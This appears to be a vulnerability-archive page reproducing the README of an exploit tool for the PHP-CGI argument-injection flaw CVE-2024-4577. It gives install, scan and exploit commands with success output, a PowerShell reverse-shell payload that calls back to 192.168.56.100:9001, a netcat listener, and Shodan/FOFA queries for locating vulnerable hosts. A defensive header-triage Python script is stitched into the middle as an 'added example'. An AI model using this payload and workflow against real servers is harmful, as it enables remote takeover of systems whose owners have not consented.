Associated vulnerability
Title:
PHP OS Command Injection Vulnerability
(CVE-2024-4577)
Description: PHP is a scripting language executed on the server side. PHP contains an OS command injection vulnerability that arises because, under specific conditions, Windows uses "Best-Fit" behavior to replace characters in the command line, which may cause the PHP CGI module to misinterpret those characters as PHP options, leading to disclosure of script source code, execution of arbitrary PHP code on the server, and so on. The following versions are affected: 8.1 before 8.1.29, 8.3 before 8.3.8, 8.2 before 8.2.20.
Description
PHP CGI Argument Injection (CVE-2024-4577) RCE
Introduction
<h1 align="center">
PHP CGI Argument Injection (CVE-2024-4577) RCE
</h1>
## 📜 Description
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an exploit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."
## 🛠️ Installation
```bash
$ git clone https://github.com/fa-rrel/CVE-2024-4577-RCE/
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt
```
## ⚙️ Usage
```bash
$ python3 CVE-2024-4577.py -s -t https://target.com/
```
## 🤖 Establishing reverse shell
### PHP Payload
> [!NOTE]
> This tool demonstrates realistic attack tactics, techniques and procedures (TTPs). However, this specific payload sample does not function in this scenario; modify shell.php to obtain a fully functional payload.
```php
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";
exec($payload);
?>
```
## 🖥️ Scanning server
```bash
$ python3 CVE-2024-4577.py -s -t https://target.com/
______ _______ ____ ___ ____ _ _ _ _ ____ _____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || || ___|___ |___ |
| | \ \ / /| _| __) | | | |__) | || |_ _____| || ||___ \ / / / /
| |___ \ V / | |___ / __/| |_| / __/|__ _|_____|__ _|__) |/ / / /
\____| \_/ |_____| |_____|\___/_____| |_| |_||____//_/ /_/
Author: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC & Scanning
[+] Target https://target.com is vulnerable to CVE-2024-4577
```
## 🎯 Exploiting Vulnerable server
```bash
$ python3 CVE-2024-4577.py -t {targetsite.txt} -e -p rev_shell.php
______ _______ ____ ___ ____ _ _ _ _ ____ _____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || || ___|___ |___ |
| | \ \ / /| _| __) | | | |__) | || |_ _____| || ||___ \ / / / /
| |___ \ V / | |___ / __/| |_| / __/|__ _|_____|__ _|__) |/ / / /
\____| \_/ |_____| |_____|\___/_____| |_| |_||____//_/ /_/
Author: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC & Scanning
[+] Exploit successful!
```
## 👨🏻💻 Netcat Listener
```bash
$ nc -lvnp 9001
```
## 🔍 Discovering vulnerable host
- **Shodan**: `server: PHP 8.1`, `server: PHP 8.2`, `server: PHP 8.3`
- **FOFA**: `protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"`
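The description above gives the affected ranges (8.1 before 8.1.29, 8.2 before 8.2.20, 8.3 before 8.3.8), and the discovery queries key on the `X-Powered-By: PHP/8.x` header. The following is an added example for the defensive side of that same information, not code from this repository: it parses the advertised PHP version out of a raw HTTP response header block and classifies it against the advisory ranges, so an internal asset inventory can flag hosts that still need the update. All header samples are constructed; the function and constant names are the example's own. A version in the affected range is only a candidate: the vulnerability also requires Windows, PHP running in CGI mode, and an affected code page, none of which the header reveals, and `expose_php = Off` hides the header entirely, so a missing header is reported as unknown rather than as patched.

```python
"""Triage X-Powered-By headers against the CVE-2024-4577 affected ranges.

Added example for asset inventory; not part of the original tool.
"""
import re
from typing import Dict, Optional, Tuple

# Fixed releases named in the advisory: 8.1.29, 8.2.20, 8.3.8.
FIXED_RELEASES: Dict[Tuple[int, int], int] = {(8, 1): 29, (8, 2): 20, (8, 3): 8}

# Matches a header value such as "PHP/8.1.28"; suffixes like "-dev" or "RC1" are tolerated.
_PHP_VERSION_RE = re.compile(r"^PHP/(\d+)\.(\d+)\.(\d+)")

# Constructed sample responses (hypothetical hosts, not real targets).
SAMPLE_HEADERS: Dict[str, str] = {
    "host-a": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.58 (Win64)\r\nX-Powered-By: PHP/8.1.28\r\n",
    "host-b": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.58 (Win64)\r\nX-Powered-By: PHP/8.3.8\r\n",
    "host-c": "HTTP/1.1 200 OK\r\nServer: nginx\r\nX-Powered-By: PHP/8.0.30\r\n",
    "host-d": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.58 (Win64)\r\nContent-Type: text/html\r\n",
    "host-e": "HTTP/1.1 200 OK\r\nX-Powered-By: ASP.NET\r\n",
}


def parse_php_version(header_value: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from an X-Powered-By value, or None if it is not PHP."""
    m = _PHP_VERSION_RE.match(header_value.strip())
    if m is None:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return major, minor, patch


def classify_version(version: Tuple[int, int, int]) -> str:
    """Classify a PHP version against the advisory ranges.

    'affected'   - branch is listed and the patch level is below the fixed release
    'fixed'      - branch is listed and at or above the fixed release
    'not_listed' - branch is not covered by the advisory (e.g. end-of-life 8.0),
                   so the header alone says nothing about exposure
    """
    major, minor, patch = version
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:
        return "not_listed"
    return "affected" if patch < fixed else "fixed"


def triage_response_headers(raw_headers: str) -> Dict[str, str]:
    """Find X-Powered-By in a raw response header block and classify it.

    Returns {'version': ..., 'status': ...}. A missing header yields 'unknown':
    expose_php=Off suppresses it, so absence is not evidence of a patched host.
    """
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "x-powered-by":
            version = parse_php_version(value)
            if version is None:
                return {"version": value.strip(), "status": "not_php"}
            return {"version": ".".join(map(str, version)), "status": classify_version(version)}
    return {"version": "", "status": "unknown"}


def triage_all(samples: Dict[str, str]) -> Dict[str, str]:
    """Map each host label to its status; handy for feeding a patch-tracking ticket."""
    return {label: triage_response_headers(hdrs)["status"] for label, hdrs in samples.items()}


if __name__ == "__main__":
    for label, result in triage_all(SAMPLE_HEADERS).items():
        print(f"{label}: {result}")
```

Hosts reported as `affected` are the ones to confirm by checking the actual deployment (Windows, CGI mode, code page) and then updating to 8.1.29, 8.2.20 or 8.3.8 as the changelog links below describe; `not_listed` and `unknown` results need a separate look rather than being treated as safe.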
## 💁 References
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
- https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
- http://www.openwall.com/lists/oss-security/2024/06/07/1
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
- https://www.php.net/ChangeLog-8.php#8.1.29
- https://www.php.net/ChangeLog-8.php#8.2.20
- https://www.php.net/ChangeLog-8.php#8.3.8
- https://github.com/l0n3m4n/CVE-2024-4577-RCE/
## ⚠️ Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.
File snapshot
[4.0K] /data/pocs/56b065050abcf7eedefef90378e53d3a1f4b5cff
├── [3.6K] CVE-2024-4577.py
├── [4.2K] README.md
└── [ 33] requirements.txt
0 directories, 3 files
Notes
1. It is recommended to access the code through the original source first.
2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.